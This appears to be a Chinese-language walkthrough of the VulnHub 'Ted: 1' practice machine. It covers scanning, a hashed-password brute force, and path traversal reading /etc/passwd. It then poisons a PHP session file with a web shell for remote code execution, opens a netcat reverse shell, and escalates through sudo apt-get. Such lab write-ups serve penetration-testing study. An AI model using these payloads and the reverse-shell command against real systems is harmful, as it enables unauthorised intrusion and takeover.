机下载地址:
Ted: 1 ~ VulnHubTed: 1, made by Avraham Cohen. Download & walkthrough links are available.https://www.vulnhub.com/entry/ted-1,327/
1. 主机发现+端口扫描+目录扫描+敏感信息获取
1.1. 主机发现
nmap -sn 192.168.59.0/24|grep -B 2 '00:0C:29:08:7C:8A'
1.2. 端口扫描
nmap 192.168.59.134 -p- -A
1.3. 目录扫描
dirb http://192.168.59.134
1.4. 敏感信息获取
whatweb http://192.168.59.134
2. WEB打点寻找漏洞点
2.1. 访问80端口
1,尝试了弱密码爆破+万能密码绕过都不行,网页源代码也没有可利用信息;
2.输入账号密码后,利用burp抓包进行测试,发现需要使用hash加密;
3.将密码本转为Hash值,将加密后的值转化为大写后爆破;-> 发现密码为admin加密值为:
8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918
4.尝试登陆 -> 登陆成功
5.通过页面的功能点测试,发现,在搜索框存在任意文件读取漏洞;
../../../../../etc/passwd
6.尝试包含用来存储用户session的文件,从而获取shell,抓取一个有session的请求包,拿到session
7nn7b01pulm3pq0kbkg525bg73
7.拼接路径search读取存储用户session的文件
/var/lib/php/sessions/sess_7nn7b01pulm3pq0kbkg525bg73
# /var/lib/php/sessions/sess_自己的Session
8.还是拼接上面那个路径,并进行抓包
抓包将数据包放到重放模块里进行测试,发现可以修改user_pref变量的值,从而写入到session文件中,再结合文件包含漏洞,造成RCE的漏洞【重复放两次,一次写入,一次查看】
9.写入URL编码后的一句话木马,输入任意信息点击搜索! 【若靶机在本机记得关闭杀软】
# 源代码 <?php system($_POST["cmd"]); ?> 输入编译后的->
%3C%3Fphp%20system%28%24_POST%5B%22cmd%22%5D%29%3B%20%3F%3E
-> 开始修改数据包
>>>1,数据包的user_pref=
后面url拼接编码后的代码:%3C%3Fphp%20system%28%24_POST%5B%22cmd%22%5D%29%3B%20%3F%3E
>>>2,搜索框即search=
后面拼接刚刚的session文件那个路径,/var/lib/php/sessions/sess_7nn7b01pulm3pq0kbkg525bg73
>>>3,路径后续拼接&cmd=测试的命令
数据包大致如下所示,具体请看编号:
2.2. GetShell
1,写入反弹shell语句,kali开启监听,成功反弹到shell
# kali打开监听
nc -lvnp 4444# 输入命令
nc+192.168.59.135+4444+-e+/bin/bash
2,利用 Python 构造一个交互式的shell窗口
python -c 'import pty;pty.spawn("/bin/bash")'
3. 权限提升
1,老规矩,sudo -l查看可执行的命令及权限 -> 存在root权限的命令文件
sudo -l
# /usr/bin/apt-get
2,利用网站资源查取这个文件的提权命令;
https://gtfobins.github.io/
sudo apt-get changelog apt
!/bin/sh
权限提升成功